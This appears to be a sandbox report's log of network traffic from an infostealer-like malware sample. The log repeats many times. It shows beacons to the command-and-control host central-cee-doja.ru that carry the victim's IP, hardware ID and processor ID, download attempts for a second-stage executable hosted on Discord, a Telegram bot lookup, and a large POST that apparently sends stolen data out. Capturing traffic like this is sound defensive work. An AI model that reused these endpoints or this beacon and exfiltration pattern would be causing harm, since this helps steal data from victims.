        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cinoshibot HTTP/1.1Host: t.meConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cinoshibot HTTP/1.1Host: t.meConnection: Keep-Alive
        Source: unknownDNS traffic detected: queries for: t.me
        Source: unknownHTTP traffic detected: POST /cin.php?ownerid=1081&buildid=am&countp=0&countc=2&username=user&country=US&ipaddr=102.165.48.52&BSSID=C059624A05&countw=0&rndtoken=clerleq-67127178950&domaindetects=0 HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------8dc0d8dd4952647Host: central-cee-doja.ruContent-Length: 99225Expect: 100-continue
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:16 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c6748b090627-IADCF-Cache-Status: MISSAccept-Ranges: bytesCache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:16 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=2e.ktMAaKcKDZm.a2PBXWzimJNiIknPB1T4Z_Ez1FW4-1704353416-1-Adtb+ZKl6oo8bPKEN1yBM4J0oPvAfpJSD+Eg+vhyYLvX1BDNZeegKuSwdWftfJ8iRCKgHCu4l5LXYf/TQdYXqbE=; path=/; expires=Thu, 04-Jan-24 08:00:16 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ATbz4f6%2FbpTzlMthvQkOtokyZvnoQQ6vl8OoVMWc8N%2FcJpKN1lRVdGqeim4Z8fj2vRSQl4K8b26DsUDt4V8DE8zpLYrhMbKYppc%2B4EleEEaqIya8BnZ2rCvGdjr%2BoG9T0eaXXA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=upUeR6ZScmfeeSJ4FSUaSoptDRqYHZ5OBdyUYEWWyC4-1704353416455-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:18 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c6810c6f2d16-IADCF-Cache-Status: MISSAccept-Ranges: bytesCache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:18 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=jCjcMB1G.D1FRlZKzEQ7Mjs7Z1291eNfR2zTHNHQU_A-1704353418-1-AZhOPa9whDtLvUjin4OxyMSI9UiDJTH10V2QViQuXqEdzpP2KQ9321OMv3M+okJt8F1oDGnARliKduJQyq7FH/Y=; path=/; expires=Thu, 04-Jan-24 08:00:18 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mMJ1acQu5Rx0%2FK0TycFFQ48PwisjFeu6bvr4CSPgJu%2B5LlKV6mXKhpjwGh5OG6SrR54UKGuyKPRF6ei2Gy%2FqARpV%2BqelTEjEsbBbB2zdNbvVDOTLujQaJhEc8jGe8whKFSU6mA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=9UX0TcAwkNGMPR8vYRT1wgioM3uIOBf90yBKCNUxyuU-1704353418470-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:20 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c68ffdcc72ed-IADCF-Cache-Status: MISSAccept-Ranges: bytesCache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:20 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPo68x3Nutk82wQqX4y_02ILwLkYbrPVy6fnJOIMbsJSjx-lhijlLo2U-vo0wrsYdl0hyzIX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=8R1i7rl7XTZevmokKczqvjP9rWOjxh3t39jgDarvM90-1704353420-1-ASi25i0pTKXfA6vrjw185aaiEnn05smv60zrL+/RvPG5P6hlCiXFDYBOA5RamS8qGt/iB92zvwVAXymTF4NYP6Y=; path=/; expires=Thu, 04-Jan-24 08:00:20 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fOI1dDr7hCLj%2FLwHodfs865tJIIKlpcaYL6WmxzGNutbODxHLtavQqawYIv3d%2BFwEKouzzc19ykVdjJytTbSYqw1JdzkNapdAcfUvuaCOEfijx3BX6O53bKsF7Efne77Pbp2ug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=GLQnn5ovu.FaTg8UVLGGZcg8og9E8dchyIwI2NkovMk-1704353420848-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:23 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c69dbd533b68-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 7Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:23 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=enMO48Rp7vtzwOUWkWSvWvwYmhZxdCBglZCkgmVhSSw-1704353423-1-AacB92qBb9+8EQLvwWdSYhDqpN94TJ9jLkK/OaPvo5ABbklU5yCPTSky1+MlJyQaKlqbjV2+vCwcg+SEMBKpEjQ=; path=/; expires=Thu, 04-Jan-24 08:00:23 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VSkHwqbStwgw6bFnEPFdo0amBv1o%2B6HOUDo5nDjCaHGIZv%2BGGCiY6MtIko%2BUGEWMEkZDTMcNMBVKCmmKVDNLXyz2Cse6e0dYrFklKh2laezw%2FyWF7QYCkoujFbUdcfA5NWQfDw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=fOPCYBl8g.Trn_ZtDhvwMnAv6.4_DrbhbDkkiNECP1g-1704353423018-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:25 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c6a9efd739b6-IADCF-Cache-Status: MISSAccept-Ranges: bytesCache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:25 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8sX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=.FmwXUKmi3YnE1mN0xt3ElPU.NYjLu62W1KPM084Mf0-1704353425-1-Ac1ucnwKDr0foQ9r/nBgnGoxAbew/MjXoYX44J1Qcjxh8TjVVQFuLbYdZjbSp6Ahb93u3Vg/aI4h1h6g5EFBOLY=; path=/; expires=Thu, 04-Jan-24 08:00:25 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IpGBmmo9daNtDEf%2F12JE46bkbZcqlEXRv7GSpAJ2wrtVmEwWnAaYkUTquFA9csNP9USl5CJHhaKHw%2FpWrcHKFSjYBwurebxqa0Levf0sALPbY0%2FZnnypNcgtqmRoEdwgKslaTQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=xq2O3k8Q9payNiKToT4_DTsOzyUnsiZ3IUyAVrszRC4-1704353425004-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:27 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c6b69cf48280-IADCF-Cache-Status: MISSAccept-Ranges: bytesCache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:27 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=OwScDxgM4jQr6OD0le7AbPAW1T9ZhbkGfarCo2Gg1Rg-1704353427-1-AfPtQix6MJDxhMqJanDlhYFoKwOV9N4i3ZG7X0WG2YIZ9TQM7Ra4vkTs3Jds+FKnNU8vgebfa5BLf5au2j9fyYI=; path=/; expires=Thu, 04-Jan-24 08:00:27 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FgBHKD%2FaMnh9BVnqbFyBKPoCiZeeTn%2BDJkRwEyolAo620ysdUAmB2KVvaH2eAtwOUImiT7apxA20tT4VDlJn5t6tqhJdjIb0v3xwxqe137IPpCgRH1B6shjJHuU45BvBEJ1zzw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=5JkOE1u70cjpLVz52_JgpK2bYeNQQxvrybFWm7hS4HI-1704353427116-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
